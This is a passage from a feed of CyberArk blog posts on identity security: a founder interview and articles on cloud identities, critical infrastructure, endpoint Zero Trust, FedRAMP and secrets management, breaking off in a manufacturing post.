On endurance:You can’t be built to last in cybersecurity without making innovation a major pillar and a major part of your strategy. It’s all about continuously extending our solutions to address modern-day attacks, both organically and inorganically, through partnering and acquisitions. We’re very unique in how much we partner in the C3 Alliance, which has thousands of integrations with third parties. That approach of security as a team sport is another thread of innovation … And part of our culture is to think like an attacker, so every team member at CyberArk approaches their role by bringing the attacker into the room in everything we do. That really drives our innovation – we not developing in silo – we’re thinking about defending against that attacker.”

On culture:Company culture is the most important aspect of a successful business. At CyberArk, we have a unique culture that’s built on the values of being smart, bold, but humble. These values are ingrained in our DNA and are reflected in everything we do. We hire and retain people who possess these traits, and it has been a key factor in our success. Our culture is global, and we have a reputation for having amazing people. I am most proud of our people and the culture we have built.”

On humility:You can’t train humble. It’s very much how people grew up. It’s people who influenced them in their life. It could be their parents, a mentor, their friends, or something that they were part of. When you’re humble, it means you’re not full of yourself. It means you’re going to listen.”

On perseverance amid geopolitical tensions:I am very proud of the resilience of the team in Israel … Something happened where people huddled and covered for each other. Like, if somebody was out in reserve duty, people covered for one another. And the output in R&D and delivery and support – everything – was greater than 100 percent.”

On aspirations: “My ultimate dream for CyberArk is for it to continue to grow and scale, while maintaining its culture and values. I want the company to be a trusted and reliable partner for its customers and to continue to innovate and address the evolving threat landscape. Personally, I hope to remain energetic, curious and always learning. Always be learning.

On identity security: “What I’ve learned is that the rise and importance of identity security is paramount in today’s digital age. With the proliferation of identities, both human and machine, the need to secure them has never been greater. The threat landscape has evolved rapidly, and attackers are becoming increasingly sophisticated in their methods. Identity security is no longer a luxury, but a necessity. It’s the key to protecting against privilege escalation, credential theft and other forms of cyberattacks. It’s a critical layer of defense that every organization must have in place to protect their most valuable assets.”

On 25 years of attacker innovation:Some things that have evolved in the attacker landscape are the makings of science fiction movies … Who would’ve imagined that there was going to be the ability for criminals to encrypt organizations and the extortion is not going to be in cash that they have to deliver in a suitcase? Instead, you can deliver a Bitcoin, and it’s going to be untraceable and they’re going to be sitting in their air-conditioned rooms getting a massage while the Bitcoin is coming in. No one would have imagined.”

On extracurricular pursuits: “Outside of work, I have a love for music and playing the guitar. I’ve been studying some riffs, like the ‘Comfortably Numb‘ solo from ‘The Wall‘ that David Gilmore plays so well – but I’m not ready for live-streaming yet. I’m also passionate about how we educate the younger generation to read real news sources and not get their news from TikTok – and reducing hate around the world. I want to stay closely in touch with innovation, and I’m able to contribute more to the ecosystem by mentoring startups – some in cybersecurity, but some not – because I think it’s beneficial to CyberArk and our customers that I get exposed to other things.”

You can listen to the entire Trust Issues podcast interview with CyberArk Founder and Executive Chairman Udi Mokady in the player below or on most major podcast platforms.

David Puner is a senior editorial manager at CyberArk. He hosts CyberArk’s Trust Issues podcast.

]]>
The Anatomy of Cloud Identity Security https://www.cyberark.com/blog/the-anatomy-of-cloud-identity-security/ Wed, 08 May 2024 19:13:38 +0000 https://www.cyberark.com/?p=190465 Cloud Identity Security Anatomy

There’s currently a cybersecurity adage with varying verbiage and claimed origins – the point, however, is unmistakable:

Attackers don’t break in. They log in.

This saying underscores the strategic shift associated with cloud adoption’s prominence in shaping the digital landscape. New environments have created new attack methods to gain access by logging in rather than infiltrating a perimeter. As technologies continue to advance, we cannot expect previous security methods to tackle these new challenges.

Before cloud environments, attackers had to break into on-premises infrastructures with a protected perimeter. Networks, servers, hardware and software were all safely within this perimeter, monitored and managed by IT. Now, organizations are effectively demolishing it. They are utilizing cloud technology and storing data on several different clouds.

Once attackers gain entry to these multi-cloud estates, any movement can mean organizational destruction. Keeping the cloud secure is vital to an organization’s business success.

But what exactly does it mean to secure the cloud? Let’s first rewind to equip ourselves collectively with the basics of cloud identity security.

Defining Cloud Environments and Deployment Types

The cloud is comprised of internet-based computing services for storage, processing and software access.

Though it sounds simple enough, when tasked with protecting “the cloud,” this answer becomes somewhat more complex. Your mission also includes protecting the various forms of cloud deployment models. Responsibilities are often unclear, but your organization is always responsible for your data, regardless of your cloud type.

Cloud environments have four different cloud deployment models, each with unique benefits and security risks. These models are:

  1. Public Cloud: The Open Playground on the Internet
    Think of the public cloud as a vast, shared playground accessible to anyone with an internet connection. Third-party vendors, such as Amazon Web Services (AWS), Microsoft Azure and Google Cloud Platform (GCP), provide cloud services in this model.
  2. Private Cloud: The On-premises Infrastructure
    Unlike the public cloud, the private cloud is like having your own exclusive club – an infrastructure dedicated solely to your organization. In this model, cloud resources are provisioned and managed within a private network, offering enhanced security, control and customization. A private cloud also increases management responsibility.
  3. Hybrid Cloud: Not Fully Committed to the Public, But Also Not Fully On-premises
    As the name suggests, the hybrid cloud combines on-premises infrastructure and cloud services, interconnected to create a unified environment. This model allows organizations to leverage the scalability and flexibility of the public cloud while maintaining control over sensitive data and applications in the private cloud. But, a hybrid cloud also increases technical complexity.
  4. Multi-cloud: Everything, Everywhere, All at Once
    In the multi-cloud model, organizations harness the power of multiple cloud providers. All hybrid clouds are multi-clouds – but not all multi-clouds are hybrid clouds. By spreading workloads across multiple clouds, organizations can mitigate risks, avoid vendor lock-in and optimize performance and cost.

Understanding Cloud Services and Resources

Now that we’ve covered cloud deployment models let’s get closer to learning how to secure the cloud by first discussing what needs to be secured.

All cloud environments contain two elements:

  1. Management platform and services
    Management consoles (accessed via the web UI, CLI or API) are the main access points into the cloud. Cloud management platforms (CMPs) are your organization’s tools to monitor and control your cloud environments. Capabilities and integrations can vary widely across vendors, but your organization will require some form of CMP, depending on the type of cloud model. All the resources in the cloud are called cloud services.
  2. Infrastructure workloads
    The second element is infrastructure workloads. Cloud resources, including virtual machines, containers, serverless functions, cloud-native apps and storage created by different cloud services, can run specific apps, services and workloads.

There are services to administer and create these various workloads, but what’s unique about these resources is that they, too, require a separate layer of identity security controls, separate from that of the platform or services.

The Shared Responsibility Model

To comprehensively grasp cloud services and resources, it’s crucial to delineate the respective responsibilities of organizations and cloud service providers (CSPs). Enter the shared responsibility model, which created for this reason. This is how CSPs communicate responsibility for the management and security of services. Some things are their problem, and some things are yours.

You will always be responsible for who can access the management console, cloud services and infrastructure workloads, which is where cloud identities come in.

Exploring Cloud Identity Types

Identities refer to who can access what in the cloud. Each type of identity has different access needs, which means each identity poses a different level of risk to your organization.

The four different types of identities that need to be secured are:

  1. Cloud Operations Identities
    Having evolved from traditional IT roles such as infrastructure operations, networking engineers or database admins, cloud operations identities are roles like cloud operators, architects and site reliability engineers. Within cloud operations, full cloud administrators have complete administrative access and the ultimate permission to affect every service and resource within the CSP account. There are also service-level admin roles, like engineers with specializations in networking or databases, that can only administer a smaller scope of services and resources.
  2. Developer Identities
    The umbrella of developer identities includes any human engineers who write code. Developers will self-administer various cloud services, create cloud-native applications, push workloads into the cloud and access supporting resources.
  3. Application and Audit Team Identities
    Other application teams, aside from developers and any audit teams checking compliance, will require access to cloud environments. Though they will require lesser privileges, like read-only access to various services, read-only access can still pose a security threat to your organization.
  4. Machine Identity Workloads
    The cloud-native applications, services, automation tools and processes that run your business are considered machine identities – and they now outweigh human identities by a factor of 45:1. Some risks for machine identities include access keys coded into software and released to the public.

The ‘How’ of Cloud Identity Security

Now that we’ve discussed the what and where of building secure, well-architected cloud environments, tackling the how requires adhering to a couple of essential guiding principles:

  1. Zero Standing Privileges
    The dream scenario of access is to reduce its availability and impact, giving someone access to the one thing they need to do and nothing else. However, these logistics are often viewed as unrealistic in the highly complex world of cloud security, especially in keeping up with cloud innovation and required velocity. The principle of zero standing privileges (ZSP) is the best solution to these challenges. You can remove persistent privileges to limit implicit trust and provide several levels of control to verify access.
  2. Time, Entitlements and Approvals (TEA)
    Designing a better user experience while keeping security foundational can be a significant challenge, especially for roles that require velocity, like developers. The key to this balanced cloud strategy is TEA:

    • Time: How much time is access granted?
    • Entitlements: What level of access have you granted?
    • Approvals: What level of checks have you undertaken on access?

You can achieve ZSP by controlling the time of sessions, dynamically provisioning least privilege entitlements and ensuring proper approvals are in place. To dive deeper into implementing ZSP and increasing the adoption of security controls, check out this fireside chat with CIO Mentor and Advisor Simon Ratcliffe and CyberArk VP of Engineering Shay Saffer.

As threat actors continue to refine log-in attack methods during the escalating adoption of cloud technology, it becomes increasingly clear that relying solely on legacy security measures is no longer sufficient. Embracing a cloud-first mentality and prioritizing identity security in the cloud is the next step in fortifying defenses in this perimeter-less era.

Alyssa Miles is a product marketing manager at CyberArk.

]]>
Transforming Critical Infrastructure Security: The Power of Identity https://www.cyberark.com/blog/transforming-critical-infrastructure-security-the-power-of-identity/ Thu, 02 May 2024 19:45:59 +0000 https://www.cyberark.com/?p=190000 Critical infrastructure identity security

In an era when every aspect of our society depends on reliable critical infrastructure, the role of identity security in safeguarding these essential services has never been more pivotal. With sophisticated cyberthreats escalating, understanding the transformational potential of identity security is akin to orchestrating a symphony. Each section – strings, woodwinds, brass and percussion – must perfectly harmonize to produce a masterpiece. Similarly, every identity and device in a network must function in secure sync to protect the critical infrastructure of our digital and physical worlds.

The Symphony of Security: Why Identity Matters Now

The future of strong cybersecurity strategies is intrinsically linked to the identity of each user and machine across your network. This insight is crucial at a time when critical infrastructure sectors such as energy, healthcare and finance face unprecedented risks. Identity security acts as the conductor, ensuring that every network element performs its role securely and effectively, safeguarding the services vital to our daily lives.

“Identity security acts as the conductor, ensuring that every network element performs its role securely and effectively, safeguarding the services vital to our daily lives. “

Identity Security: The Cornerstone of Resilience

Identity security is not just about protecting human and non-human identities —it’s about helping to ensure the continuity and resilience of services that society depends on. Focusing on identity can help transform the security landscape of critical infrastructure by:

  • Proactive Threat Detection. By harnessing the power of artificial intelligence, identity security solutions can predict and neutralize threats before they manifest, transitioning from a reactive to a proactive security posture.
  • Enhanced Compliance and Control. As regulations become stricter, identity security can help organizations stay ahead of the curve. Managing privileged credentials and monitoring access can help ensure that only the right entities have the right access at the right time, aligning with compliance needs.
  • Securing the Remote Frontier. As remote work and the increasing need for third-party vendors become the norm, securing identity extends beyond the physical office and remote employees. Comprehensive identity management ensures that secure remote access remains a gateway to productivity, not vulnerabilities.
  • Innovative Access Technologies. The shift toward passwordless authentication is helping to transform it into a seamless yet secure process, authenticating each user while reducing the reliance on credentials.

Harmonizing Security: The Zero Trust Model

In the grand symphony of identity security, adopting a Zero Trust framework is like tuning each instrument before a performance – ensuring every note plays only at the right moment and precisely as intended. Zero Trust operates on the principle that trust is never assumed for humans or machines. By implementing measures like just-in-time (JIT) access and zero standing privileges (ZSP), organizations orchestrate a dynamic and resilient security infrastructure. This approach ensures that every element within the network contributes harmoniously, maintaining the integrity and security of the entire ensemble.

Strengthening Partnerships and Sharing Intelligence

Just as a symphony grows through collaboration among its musicians, strengthening partnerships and enhancing information sharing across sectors – including agriculture, communications and transportation – play a critical role in orchestrating effective security measures. Identity security solutions should enable secure, confidential information sharing among third-party vendors and stakeholders, which is vital for developing timely, actionable intelligence.

Your Role in the Cybersecurity Symphony

As a cybersecurity professional, your role is to ensure that every “instrument” – every user and device within your network – plays its part perfectly. By integrating advanced identity security solutions, you contribute to a secure, resilient future for critical infrastructure, ensuring this vast symphony performs flawlessly for generations.

Learn how a global multi-energy provider protects privileged users and vendors with a comprehensive privileged identity security strategy.

Chris Maroun is a senior director in CyberArk’s field technology office, and Ryne Laster is a product marketing manager at CyberArk.

]]>
The Importance of Identity Security in Zero Trust Endpoint Defense https://www.cyberark.com/blog/the-importance-of-identity-security-in-zero-trust-endpoint-defense/ Tue, 30 Apr 2024 14:21:02 +0000 https://www.cyberark.com/?p=190085 Identity security Endpoint Zero Trust

Identity security and Zero Trust have emerged as critical components in the defense against quickly evolving cyberthreats. Together, the solution and the approach support a default stance of “never trust, always verify,” with every risky action requiring authentication, authorization and audit. In the CyberArk 2023 Identity Security Threat Landscape Report, we found that 74% of organizations have begun the implementation of Zero Trust initiatives, with another 18% planning to do so in the next 12 to 24 months. If you’re reading this blog, you may be on a team driving these strategic initiatives and working with cybersecurity vendors to implement them. And if you haven’t yet considered extending identity security over your desktops and servers, it’s high time you do so. Read on for the why and how.

When working on strategic programs, some investments in cybersecurity, such as multi-factor authentication (MFA) and Single Sign-On (SSO), are widely recognized for reliably delivering relief to the defending teams – and, as such, prioritized. Some are even explicitly called out as examples of required capabilities, such as MFA. Critically, though, these programs remain no more than a set of siloed technologies for far too many Zero Trust implementations as technologies are viewed as belonging to certain domains (for MFA, that would be the IAM domain) instead of a broader angle.

The omissions are the most glaring when you look through a holistic identity-first approach lens, especially considering the first mile of user access and the last mile of information consumption – the endpoint. In fact, according to the Identity Security Threat Landscape Report, 79% of 2300 cybersecurity experts around the globe indicated that Identity Management is the most critical principle for successful Zero Trust initiatives, followed closely by endpoint security device trust (78%).

These stats imply that these capabilities are vastly different. But are they? Should we consider some capabilities of identity management and security as critical contributors to endpoint security?

I certainly think so.

Zero Trust in the Endpoint Department

If your day-to-day job lies in Identity and Access Management (IAM), you should be familiar with many paradigms that fit into and comprise Zero Trust. Those include least privilege, zero standing privilege (ZSP), just-in-time (JIT) access and privilege, continuous authentication and risk assessment. The same logic should apply to endpoints – both workstations and servers. Not for nothing, the principle of least privilege (PoLP) is designated as the cornerstone of Zero Trust. It is an ever-present recommendation of auditors and authorities in the cybersecurity field.

So, if your endpoint security strategy is built around capabilities that scrutinize applications, processes and actions and respond to those deemed malicious, your Zero Trust initiative should get some attention in the endpoint department. After all, isn’t Zero Trust fundamentally about proactive rather than reactive measures?

Now consider the simple diagram below. A very traditional endpoint security setup would include a combination of unified endpoint management (UEM) and endpoint detection and response (EDR). These technologies, while providing a near-complete coverage of an attack kill chain, are very asset or resource-centric, meaning they usually focus on specific files, folders and processes. What should have been there from the very start – the identity context – has been notably missing. Analysts and the industry recognize this and have now expanded detection and response to include protection from identity threats in the form of ITDR.

But what about identity-centric prevention?

Endpoint defense-in-depth graphic

Despite the widespread adoption of various security measures, their effectiveness is ultimately contingent upon their convergence at the endpoint. The endpoint is where identities interact with critical resources and identity security and Zero Trust approaches must converge to provide a comprehensive defense. In today’s environment, characterized by an abundance of new identities, hybrid environments and sophisticated AI-driven threats, security is a question of how seamless your identity security fabric is and how complete the coverage of your assets is.

The Case for Proactive, Identity-centric Endpoint Security

Perhaps surprisingly, if you shift your mentality from the comfortably numb, “It’s not a question of if, but when,” back to attack prevention – and do a good enough job of setting endpoint privilege fundamentals – it may just be the security formula you’re looking for.

If you are a tenured defender, you may be thinking, “We tried that. It didn’t work 20 years ago – why should it work today? There’s a reason we ended up in an EDR-centric endpoint security camp.” All true – we did try, heard back from users, and opted for business agility and moving fast. Around 10 years ago, ransomware changed the game, and, as a result, cybersecurity today is a topic at the board level, and businesses today have to proactively inform the shareholders about security measures they take to prevent cyber incidents. What is also different now is that we finally have the right tools for the job.

Endpoint identity security platform graphic

Identity – the new (and the last standing) security perimeter – must be woven into anything happening within our infrastructure. It should be continuous and reliable. As part of identity security, this job is performed by an endpoint identity security agent that provides the ability to discover and secure privileged accounts on the endpoints, secure user authentication mechanisms, provide passwordless and strong authentication injection points into user workflows, harden other security agents and browsers and play a critical identity bridging role to ensure a single point of authority over identities throughout the organization.

Couple this with common endpoint privilege management (EPM) that helps discover and remove local admin rights, provide automated and transparent elevation for applications and isolate risky applications from accessing certain resources, enforce role-specific least privilege, defend credentials and security tokens, and add additional ransomware protection – and you have an excellent foundational layer of defense.

Having completed this loop and extended the identity security over your workstations and servers, you’ve ensured that your endpoint security plays into your Zero Trust initiative. Getting this identity-centric prevention right will help your organization do four critical things:

  1. Extend identity security and Zero Trust to your workstations and servers
  2. Decrease the endpoint attack surface and prevent zero-day attacks
  3. Reduce IT security and operational costs with endpoint privilege controls
  4. Demonstrate compliance and meet audit requirements on the endpoint

Additionally, this layer of security can improve user productivity and experience for all employees.

In short, if you extend identity security over your desktops and servers, your users, administrators, SOC analysts and shareholders will appreciate it.

Andrey Pozhogin is a senior product marketing manager at CyberArk.

 

]]>
The Role of FedRAMP in Federal Agency Digital Transformation and Cybersecurity https://www.cyberark.com/blog/the-role-of-fedramp-in-federal-agency-digital-transformation-and-cybersecurity/ Thu, 25 Apr 2024 15:44:45 +0000 https://www.cyberark.com/?p=189990 FedRAMP Federal digital transformation cybersecurity

Not too long ago, when I was designing, building, operating and defending networks, the government organizations I worked with were burdened with many tasks related to deploying a new capability. We needed to decide and plan how it would be assessed and authorized, deployed, maintained, operated, patched, defended and, of course, when and how to upgrade the capability.

Assessment and authorization would take months, if not over a year, for a system or set of capabilities. Deploying and setting up complex on-premises software demanded extensive time and resources from our IT teams. Maintenance was continuous, requiring regular monitoring and troubleshooting to ensure smooth operation.

Patching was particularly critical and time-sensitive, as any delay in addressing vulnerabilities could lead to security breaches. Our IT staff had to be constantly alert, integrating updates while minimizing business interruption. Upgrading software often posed a significant challenge, as comprehensive testing was needed to avoid operational downtime.

Cybersecurity was another intense area of focus. Internal resources had to construct and maintain robust defense systems, with dedicated personnel to monitor and counteract threats promptly. Each application increased the potential attack surface, necessitating sophisticated and wide-ranging security expertise.

“A FedRAMP-authorized identity security solution is more than a product – it’s a strategic ally in the mission to protect the nation’s digital frontiers. “

The Challenges of Deploying New Capabilities

The responsibilities of securing, maintaining and refreshing software were complex and costly, falling squarely on organizations’ internal teams – a demanding reality now alleviated by the software-as-a-service (SaaS) model.

Another factor in designing, operating and defending networks has been the evolution of cybersecurity toward the Zero Trust framework. The increasing complexity of cyberthreats has driven organizations to adopt a Zero Trust mindset, the rise of cloud and remote access technologies – and the recognition that traditional perimeter-based security is no longer sufficient.

Today, federal agencies have many competing requirements to meet beyond cybersecurity directives. We often talk about agencies needing to meet Executive Order (EO) 14028, issued in 2021 and centering around improving U.S. cybersecurity. The Biden administration has also tasked federal agencies with “Transforming Federal Customer Experience and Service Delivery to Rebuild Trust in Government” (EO 14058). The Office of Management and Budget (OMB) issued further guidance in 2023 with “Delivering a Digital-First Public Experience” (OMB M-23-22). In essence, agencies have two daunting goals in the digital transformation of their services while improving their cybersecurity.

One way to quickly achieve both requirements is to use software-as-a-service (SaaS) capabilities that have gone through the FedRAMP authorization process. Using the trusted FedRAMP process, agencies can rapidly procure and deploy solutions to meet their mission objectives.

Improving Cybersecurity Today Means Going on a Zero Trust Journey

Agencies have a lot on their plates, and for most of them, cybersecurity is not their core competency. Using solutions that have a FedRAMP authorization enables agencies to focus on their core competencies, delivering services to customers while conducting their digital transformation and maintaining cybersecurity. Adopting cloud-based solutions is an attractive business strategy, as organizations can streamline operations and reduce costs.

EO 14028 assigns agencies the responsibility to modernize their cybersecurity and advance toward a Zero Trust architecture. Zero Trust can be considered a foundational initiative that, together with an organized framework like the NIST Cybersecurity Framework, enables decision-makers and security leaders to achieve pragmatic and effective security implementations. Zero Trust efforts must incorporate, coordinate and integrate a challenging combination of policies, practices and technologies to succeed. As agencies begin consuming more capabilities from the cloud, the ability to use solutions that have already undergone the FedRAMP process will speed the transition.

Identity Security Capabilities Need the Highest Security

Identity security capabilities are foundational to protecting agency assets and identity is the target of many of the new attack methods we hear about from our customers and red team. I firmly believe that identity security capabilities should be a focus area of an organization’s overall security efforts. In today’s digital landscape, where cyberthreats constantly evolve and become more sophisticated, strong identity and access management controls are crucial for protecting sensitive data and systems. Identity security capabilities serve as the gateway to an organization’s resources. Identities, whether they belong to users, applications or devices, are the primary vectors through which access is granted or denied. Without robust identity security measures in place, an organization becomes vulnerable to unauthorized access, data breaches and other cyberthreats.

Agencies should use solutions authorized at the FedRAMP High-impact level since the effect of the loss of confidentiality, integrity or availability will have severe repercussions on operations. The newly authorized identity and endpoint privilege management solutions from CyberArk are what many agencies can use to evolve their Zero Trust maturity and meet the control requirements for your IT environments.

Benefits of FedRAMP to Zero Trust – Maintaining Speed to Value

As agencies continue to deploy more pieces of their Zero Trust architecture, the union with a FedRAMP-authorized identity security solution is more than compatible – it’s strategic. It enables a robust, compliant, future-focused stance against cyberthreats, ensuring the journey is embarked upon and sustained with a vigilant and compliant guardian.

I recommend that agencies adopt FedRAMP-authorized identity security solutions and engage in continuous education and training for their personnel. Understanding that adversary and agency objectives are dynamic means ensuring your security solutions’ functionality matures in response and recognizing that your people are your best line of defense. Moreover, agencies should work closely with their solution providers to ensure mission objectives are effectively accomplished as a team. Collaboration is vital in cybersecurity – a partnership approach can significantly enhance the effectiveness of serving your customers and maturing your Zero Trust strategy.

The journey to Zero Trust is ongoing. With the right tools and mindset, government agencies can look forward to a more secure future. A FedRAMP-authorized identity security solution is more than a product – it’s a strategic ally in the mission to protect the nation’s digital frontiers.

James Imanian is senior director of the U.S. Federal Technology Office at CyberArk.

]]>
Defense-in-Depth for Secrets Management: Discovery, Visibility, Leak Detection and AI https://www.cyberark.com/blog/defense-in-depth-for-secrets-management-discovery-visibility-leak-detection-and-ai/ Tue, 23 Apr 2024 13:10:53 +0000 https://www.cyberark.com/?p=189939 Globe futuristic technology abstract background illustration

In the past, many security teams considered securing secrets enough – if your secrets were secured, you were good. While you’re still kind-of-good staying on this course, security professionals increasingly recognize that just securing secrets is not enough – organizations require a more sophisticated solution to help protect themselves in today’s increasingly sophisticated threat landscape.

For large organizations with vast application portfolios, safeguarding these secrets and the newly created secrets from agile dev teams is challenging. And the growing number of secrets can increase the cyber debt associated with unsecured applications if not addressed. Fortunately, with a defense-in-depth approach, AI and automation, security teams increasingly have opportunities to further address and improve the security of the organization’s machine identities and reduce cyber debt.

“Security professionals increasingly recognize that just securing secrets is not enough – organizations require a more sophisticated solution to help protect themselves in today’s increasingly sophisticated threat landscape.”

The High Cost of Unknown Secrets and Leaks

Security teams recognize that they can only secure the secrets and machine identities they know. The problem is that security is often unaware of all the secrets, especially with cloud workloads. And essentially, if you’re unaware of a secret, you’re probably not securing it.

Organizations also increasingly recognize that when secrets management best practices are not followed, there is an increased likelihood of secrets being leaked and exposed publicly.

And with all the ongoing breaches of human and machine identities, there’s increased awareness that the consequences of a secrets breach can be devastating for the enterprise. Organizations look to remediate the situation rapidly when a problem, such as an unsecured secret, is discovered or a leaked secret is detected.

Secrets and Vault Sprawl: A Growing Challenge

But why now? What’s changed, that makes just vaulting secrets no longer enough? While cloud, digital transformation and DevOps adoption have driven incredible business benefits, they’ve also created many secrets and, too often, vault sprawl. Cloud service providers’ (CSPs) built-in secrets stores, such as AWS Secrets Manager (ASM) and Azure Key Vault (AKV), are becoming increasingly popular and widely used by development teams – they can be very effective tools. Dev teams can easily start using the built-in secrets stores, creating a store for each project or on an account or subscription basis. This is often encouraged by the CSP – Azure, for example, recommends using separate key vaults. The result is multiple secrets stores, running into potentially thousands of secret stores in a large enterprise. In many organizations, the challenge for security teams is that the vaults can be created without their knowledge. So, security teams are too often, especially when less familiar with the cloud, unaware of the secret stores and the secrets in these stores.

The Challenge of Securing Secrets for Security Teams

So now developers and cloud teams are establishing new secrets stores and securing secrets in them, without security being aware that the secret stores even exist. Okay, but is that so bad? The secrets are at least vaulted in a secrets store. Still, while this can provide some level of security, this approach doesn’t scale and is unlikely to meet corporate compliance and security policies. Some critical problems with this approach are:

  1. Security teams are unaware of the secrets in the secret stores, the policies followed (or not followed), and how effectively they are being secured – e.g., what are the secrets used for? What does the secret provide access to? What are the security policies? Which apps are using these secrets?
  2. Multiple secrets stores create vault sprawl and secrets sprawl. Instead of the enterprise having a single copy of a secret that’s secured and managed in a single centralized vault, with vault sprawl, there are multiple copies of the same secret in numerous vaults and even across multiple cloud environments. If attackers can’t steal from one vault, they will just find another that’s less secure.
  3. Secrets rotation is typically not supported by the cloud providers’ built-in secrets stores. And with secrets sprawl, secrets rotation often becomes essentially impossible when multiple apps potentially use the same secrets in production environments. Unless the secrets are rotated in a coordinated manner, one or more production apps will go down because they are still using the old credentials.
  4. Meeting compliance and audit requirements is challenging without a centralized view of secrets. How will auditors be comfortable that applications and secrets are in compliance if the same secret is stored in multiple secrets stores, and with the uncertainty that there may be some secrets stores they are not even aware of?

So why doesn’t the corporate security team simply get developers to secure secrets in a central store? Well, let’s get real – security is rarely going to be able to change the developers’ workflows and behavior. So, how can security teams secure these secrets scattered across potentially thousands of secrets stores? Well, the good news is that there are solutions that can centrally secure secrets without forcing changes in the developers’ workflows.

Protecting Secrets: Are You Responsible for What You Don’t Know?

In many organizations, security is likely to be held responsible for secrets they may not even know exist. It’s not a great situation, so first, let’s figure out what secrets exist. Fortunately, security teams can increasingly get visibility and secure the secrets in these built-in secrets stores. Discovery tools are becoming increasingly important because they can give security visibility into all the secrets stores across the enterprise.

These discovery tools can also derive insights such as when the secret was last used, whether it is idle or unused – and when it was last rotated – if at all. They can also provide a mechanism to track the owner of the secrets stores and the secrets. Most importantly, security teams can now assess and prioritize which secrets and secrets stores they want to centrally manage in a vault and potentially even work with the cloud and development teams to ensure that best practices are followed.

Automating Onboarding Secrets: The Ideal Solution

Of course, in an ideal coding environment, there would be no unmanaged secrets to discover. For example, as soon as the developer uses their AI-assisted IDE (integrated development environment) to write the code that requires a secret, simply having the secret request in the code would ensure that the secret is centrally secured or a policy established for securing the secret automatically at run time. Effectively, this approach shifts left and creates the secret within the infrastructure as code so that the newly created secret is automatically onboarded and centrally secured when the infrastructure is spun up.

Unfortunately, in most situations today, this is not the case and secrets are not automatically onboarded to a central secrets store managed by the application security team. Instead, too often, they are unsecured (e.g., hard-coded) or dropped into one of the CSP’s built-in secrets stores – a store that security is potentially unaware of. So, in this case, the security team will need first to discover the secrets and then, once found, centrally secure them.

AI Tools: Offering Insights and Promising More

Once you can discover secrets across all the various secrets stores, AI tools coupled with discovery, other secrets tools and automation promise to detect anomalies, force rotations and prioritize which secrets need to be onboarded, providing another layer of defense. Today, we’re still in the early stages of determining the most effective use cases for AI to improve the security of machine identities and their associated secrets, and it’s a fast-moving area.

Leak Detection: Preventing Incidents When Best Practices Aren’t Followed

Of course, development and cloud teams do not always follow best secrets management and coding practices. We’re all human, and too often, there’s the potential for human error, workarounds and quick fixes that can expose secrets that should have been secured across public code repositories.

Consider a developer prototyping an automation script or app for a quick demo that needs some credentials – it’s just too easy to hard-code the secret. Attackers don’t care if it’s a simple script or a complex app – they just want to steal that database credential or cloud access key. Of course, once the secret is rotated, the hard-coded secret is useless, but until it’s rotated, it’s something an attacker can exploit. In another scenario, the hard-coded secret has been removed and vaulted.

So, is it all good?

Well, no, not until it’s rotated.

What happens when the code with a hard-coded secret is posted to a public Git repository?

It’s exposed.

Yes, these edge cases shouldn’t happen; the problem is that they occur. Over 10 million secrets and credentials were detected in Git repositories in 2022, according to GitGuardian.

These are examples of secrets you thought you’d safely secured but were leaked by human error. An added layer of defense is to secure secrets in a central vault and continually check that none of these secrets have been inadvertently leaked because of human error. Of course, once a leaked secret is detected, it needs to be rotated so that any existing copies are invalidated.

Automated Remediation: Reducing Cyber Debt

Another challenge for security teams is the vast number of applications, secrets stores and cloud use cases. There are many secrets and machine identities, and more are being added constantly. Unsecured applications are often referred to as cyber debt, and reducing cyber debt is becoming an increasing challenge for security teams, forcing them to at least keep pace with development teams to prevent it from growing further.

Cyber debt and the desire for multiple layers of defense make for an increasingly compelling need to not only detect problems such as unsecured secrets in the cloud providers’ secrets stores or leaked secrets but also to provide automated tools for remediating these challenges. Without a doubt, AI tools are going to help security teams detect potential issues and anomalies, and this will, of course, make automated remediation of anomalies even more critical.

While attackers will inevitably become more aggressive and innovative in exploiting machine identities, security teams have the tools to protect their organizations more effectively. Fortunately, with layered defenses, discovery, leak detection, AI tools, automation and other innovative approaches, we can prevent an unsecured secret from exposing the entire organization to an attack.

Chris Smith is a director of product marketing at CyberArk.

]]>
The Knight in Shining Armor: Identity Security in Manufacturing Cybersecurity https://www.cyberark.com/blog/the-knight-in-shining-armor-identity-security-in-manufacturing-cybersecurity/ Fri, 19 Apr 2024 13:38:17 +0000 https://www.cyberark.com/?p=189880 Rendering of a digital fortress to accompany blog about manufacturing cybersecurity.

In the throes of the Fourth Industrial Revolution, the manufacturing sector stands at the crossroads of groundbreaking innovation and an ever-growing shadow of cyberthreats. IT modernization has created digital fortresses by transforming legacy manufacturing systems and operations into connected, smart factories – the demand for robust cybersecurity measures has never been more critical. Identity security acts as a noble knight armed with a sword and shield in the ongoing battle against digital adversaries. It can help to give manufacturing cybersecurity leaders the strategic advantage needed to help safeguard their domains.

The Dawn of a New Era in Manufacturing Cybersecurity

Envision the digital landscape of manufacturing as a vast kingdom. Alive with innovation and growth, this realm faces relentless threats from digital hackers eager to exploit any vulnerability. The merging of the Internet of Things (IoT) and operational technology (OT) has unveiled new gateways for cyber intruders, transforming cybersecurity from a mere concern to the bedrock of manufacturing resilience.

Graphical image of a cyberattack chain, along with a breakdown of five elements: credential theft; malicious actors; lateral and vertical movement; privilege escalation and abuse; actions on objectives.

The introduction of smart factory technologies also carries a double-edged sword. It propels us toward unmatched efficiency and connectivity and widens the battlefield, necessitating fortified defenses.

The Vanguard of Manufacturing Cybersecurity

In this evolving arena, identity security solutions emerge as the knight in shining armor, equipped to protect the realm’s digital and physical assets. By tackling the core challenges of privileged access management (PAM), endpoint security, secure remote access, credentials and overarching compliance, identity security doesn’t merely defend – it empowers manufacturers to secure their innovation processes, uphold operational integrity and nurture trust among customers and partners alike.

Solutions for Manufacturing’s Greatest Cybersecurity Challenges

To fortify your manufacturing operations, understand the evolving realm and digital attack landscape. Start with a comprehensive audit of your assets to assess their maturity and interconnectivity. As manufacturing merges more with digital technologies, vulnerabilities may increase, particularly through legacy systems and complex supply chains. The most successful business transformations come from prioritizing cyber-safety within your organizational culture, fostering a shift toward recognizing the critical role of digital technologies in traditional manufacturing environments.

Implementing such strategic measures is vital for protecting your kingdom, maintaining operational integrity and gaining a competitive edge. With these foundations, there is a clear path for safeguarding your operations with the assistance of an identity security knight.

Here are some essential strategies that can help to achieve this:

  • The quest for authorized access. PAM systems can help to ensure that only authorized personnel have access to sensitive systems and data – the keys to the kingdom. These systems act as gatekeepers, verifying identities and enforcing access policies to protect against unauthorized entry and the spread of ransomware and malware.
